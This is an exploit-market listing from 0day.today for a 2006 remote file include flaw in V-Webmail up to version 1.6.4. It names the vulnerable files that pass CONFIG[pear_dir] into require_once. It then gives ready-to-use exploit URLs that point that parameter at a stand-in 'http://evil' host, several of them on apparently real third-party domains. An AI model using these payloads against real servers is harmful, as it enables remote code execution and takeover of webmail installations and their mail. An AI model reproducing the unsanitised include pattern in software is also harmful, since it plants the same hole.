[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability

Author
beford
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-446
Category
web applications
Date add
24-05-2006
Platform
unsorted
===============================================================
V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability
===============================================================




Script: V-Webmail 1.6.4
Vendor: http://www.v-webmail.org/
Description: V-webmail is a powerful PHP based webmail application with an
abundance of features, including many innovative ideas for web applications
Discovered: beford <xbefordx gmail com>
Vulnerable File

v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php');
v-webmail/includes/mailaccess/pop3.php =>
require_once($CONFIG['pear_dir'] . 'Net/POP3.php');

Version 1.3
http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil

Version 1.5  - 1.6.4
http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil



#  0day.today [2024-12-25]  #